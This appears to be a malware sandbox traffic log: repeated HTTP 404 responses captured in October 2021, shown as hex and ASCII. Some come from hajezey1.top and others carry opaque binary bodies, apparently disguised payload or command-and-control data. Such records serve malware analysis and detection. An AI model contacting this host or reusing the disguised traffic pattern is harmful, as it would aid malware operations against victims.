Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c d8 21 bd 40 8f 8c f5 cf 9b 2b 25 9b f6 ba e9 1a b0 1c 67 74 d2 5f 9f 87 cd 29 80 78 51 a1 a2 8f 4c 3d d8 1c e0 32 02 50 08 e8 df e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 e1 8a 20 59 55 11 5c 03 25 6e ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 5d ca cc 8a 44 d8 06 0e 45 67 14 7d 63 fb e0 04 89 f9 d4 57 80 90 70 89 ec 24 4d 6b 0e e1 a2 22 48 32 da 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 83 97 5f 96 da 19 d1 3a 2d 12 44 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 7d 87 4a 04 38 cd 78 14 2c de e8 b1 14 c5 76 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 c2 49 64 cd 25 5c 8d b7 1d 24 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 a5 32 b2 be 34 56 9b 46 76 99 86 11 00 83 32 42 62 6e c9 ae d4 15 95 36 e1 48 50 67 7e 50 b8 81 be e5 81 de e3 75 6d 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 a7 df f2 4a 0b 7d 54 7a 9c 6c 39 c0 a1 0c 5c 19 d6 63 95 be 07 3d da 9a 7e 05 22 7d e6 b2 68 60 b9 10 31 eb cd fc 25 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 7b 88 4b 2e 69 81 77 af 5d c6 83 41 69 2f 14 b6 e8 95 19 6d 76 d6 60 83 70 56 3e 0f 60 7c aa 9f 50 54 0c f3 a6 eb 5a ed 33 bd 8a f1 7a 5b b4 18 20 5e 7a 14 f7 f2 26 2b e9 c4 ef 28 e8 98 eb e7 6c ba 25 8f fc da 14 79 a2 8e b9 08 90 bb 77 c6 19 2a 16 bf 43 b3 ea 3d b2 13 3b 35 02 1a 1b eb 22 f5 4e ad e8 16 83 83 6f d4 ed 3f ec c9 81 68 73 02 99 ea fc cd c3 05 d0 93 d3 23 39 01 c4 a5 c8 63 77 da 0b af bd d9 39 69 a1 99 9c 77 e8 0f 4e 8c da 06 b9 37 87 8c b4 26 b8 2c 58 32 77 6c 08 da f9 d2 eb 48 25 66 37 2d 2f f2 5e a5 27 48 84 89 ff 67 37 f9 bd a1 97 2b 86 f3 bd 98 bb 1f 77 c7 26 e1 39 c6 86 8e f0 09 af 63 9d 31 09 a8 50 13 30 7b 32 8c c9 e1 d5 c0 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 f8 3f d8 2c eb 53 43 ae 3b 97 e4 23 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 7f e2 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 ff 95 87 cd 2b 80 78 51 a1 a2 8f 2c df d2 1c e0 32 02 50 08 08 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 41 8f 20 59 55 11 5c 7c 3b 66 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 bd 28 c6 8a 44 d8 06 0e 45 c7 1e 7d 6f fb e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 52 df 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 23 36 55 96 da 19 d1 3a 2d b2 4e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 71 87 4a 04 38 6d 72 14 2c d0 e8 b1 14 65 7c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 a2 4c 64 cd 25 5c 8d b7 bf 2e 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 c5 d0 b8 be 34 56 9b 46 76 99 86 11 00 83 32 42 52 f7 c2 ae 64 0f 95 36 e1 48 52 67 25 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 bc a6 62 4a 08 5d f6 b3 06 2d 1a c0 5e f3 7c bb a7 fd d4 98 21 17 da 9a 2d 35 23 7d f5 b2 68 60 b8 10 31 fa ed ad 67 e1 e1 bd 84 f3 8c 40 b6 f0 90 4f a1 21 71 ae 61 2e 7a b1 76 af ce c6 83 41 66 30 ae a9 c8 d0 7e 33 3a 64 67 0b bf 77 6a 66 21 0e 8a ef 28 1d 41 81 d4 b6 78 8e 18 d3 e4 9e 0c 7b d6 6c 02 2f 27 76 d7 9b 4e 20 ba f5 be 08 85 fd 89 aa 41 b7 28 8f f4 d5 06 78 5c 9b b8 08 c0 e5 5c c5 17 00 f3 b8 d0 a3 39 a9 b2 13 20 1d 06 1a 1b e1 ea f0 6c 8d e9 c7 d2 83 6f d5 c5 3b ec cf 8b 40 75 02 99 e0 03 f4 c3 05 cb 99 d3 23 2a 71 c7 a5 d9 62 77 ca 08 8f bd c8 11 61 a1 99 9e 5f e3 0f 4e 8a d0 23 9d 43 8e 7e 14 0e b9 2c 58 99 f7 6d 08 d8 fd f7 cb ab 42 66 fb 05 6d 77 5e 8e b7 4a 84 99 fb 42 17 7d bd 91 94 13 85 f3 bd b3 3b 1c 67 c7 22 e7 19 8e 53 c0 b2 21 ab 63 95 22 89 ac 1f 13 34 5e 12 59 b3 52 34 eb e0 0f 25 b8 a3 c1 1d d7 cb ab 14 62 f3 3b 1f 70 da be 91 b3 bf de 2c eb 57 66 80 fe 9d 11 b0 5e fe 14 f9 20 e4 89 93 64 4b 70 94 ea 13 6b e6 e8 80 0b 3d f2 9d 65 09 de fb 18 e1 98 ea 30 e3 dc dd 6a db 82 96 dd
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:29:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0
